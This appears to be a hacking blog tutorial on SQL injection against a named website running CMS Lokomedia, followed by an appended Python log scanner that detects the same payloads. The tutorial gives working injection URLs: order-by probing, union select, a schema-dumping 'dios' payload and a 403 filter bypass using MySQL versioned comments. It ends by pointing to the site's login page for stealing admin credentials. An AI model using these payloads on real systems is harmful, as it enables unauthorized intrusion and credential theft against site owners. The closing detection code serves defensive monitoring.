SQL injection in CMS Lokomedia and bypassing 403 Forbidden
[+]Author : . ./Snopunks
[+]Google Dork : click here
[+]Download the txt : click here
[+]Proof of Concept : First, find out whether the site is vulnerable to SQL injection: if you enter a string and there is an error or a damaged / missing image, then the site is vulnerable.
We meet again on this simple blog.
This time I want to show how to do SQLi on CMS Lokomedia.
Here I already have a target:
Just add the string, for example:
http://www.kagemjogja.org/hal-visi-misi'.html
See, once the string is added, the image on the left disappears.
Look left, left, hey, not right.
Look at the image and see what the difference is.
Now just do order by and so on.
Here I found the error at number 20, and normal at 19.
Then just union select to find the lottery numbers.
example: 1.http://www.kagemjogja.org/hal-visi-misi'+order+by+19--+.html
2.http://www.kagemjogja.org/hal-visi-misi'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
Huh, why don't the numbers show up?
Relax, just add 'and+0+
example: http://www.kagemjogja.org/hal-visi-misi'and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
See, the lottery numbers show up :v
Now just paste the dios at the lottery number from before:
example: http://www.kagemjogja.org/hal-visi-misi'and%200+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
Well, 403 Forbidden, our action is blocked.
Just bypass it.
Replace the earlier dios with this dios:
/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
Don't get it?
Here, look at the example:
http://www.kagemjogja.org/hal-visi-misi'and%200+union+select+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-.html
See, it's no longer forbidden.
Now we just look for the username and password.
Login page: http://www.kagemjogja.org/login/
OK, that's all, hopefully it's easy to understand >_<
Thank you for visiting this simple blog >_<
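The second payload above stopped returning 403 once its keywords were wrapped in MySQL versioned comments (/*!12345...*/), whose body the server still executes. As an added defensive example (not part of the original post), this Python detection URL-decodes logged request paths and unwraps those comments before applying keyword rules; the rule set, function names, slug and log lines are constructed assumptions, and the raw-versus-normalized comparison assumes a filter that anchors keywords on word boundaries.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!NNNNN ... */ as SQL, so unwrap it instead of dropping it.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Hypothetical rule set, keyed to the probes shown in the post.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "user_var_assign": re.compile(r"@\w*\s*:="),
}

def normalize(path):
    """Decode, lowercase, unwrap versioned comments, drop plain ones, squeeze spaces."""
    for _ in range(3):  # bounded repeat covers double-encoded input; no-op once stable
        path = unquote_plus(path)
    path = VERSIONED.sub(r" \1 ", path.lower())
    path = PLAIN.sub(" ", path)
    return re.sub(r"\s+", " ", path)

def match_rules(text):
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(log_lines):
    """Return (path, hits_on_raw, hits_on_normalized) for each flagged request."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        path = m.group(1) if m else ""
        norm = match_rules(normalize(path))
        if norm:
            findings.append((path, match_rules(path.lower()), norm))
    return findings

# Constructed access-log lines (documentation IP range, placeholder slug).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /hal-sample.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /hal-sample\'+order+by+20--+.html HTTP/1.1" 200 3010',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /hal-sample\'and%200+union+select+1,2,3--+-.html HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /hal-sample\'and+0+union+select+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/))),3--+-.html HTTP/1.1" 200 9100',
]

if __name__ == "__main__":
    for path, raw, norm in scan(SAMPLE_LOG):
        print(f"{path}\n  raw rules: {raw}\n  normalized rules: {norm}")
```

Requests whose raw hit list is shorter than the normalized one are those a keyword filter without normalization would have passed.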
How do I dump the username and password?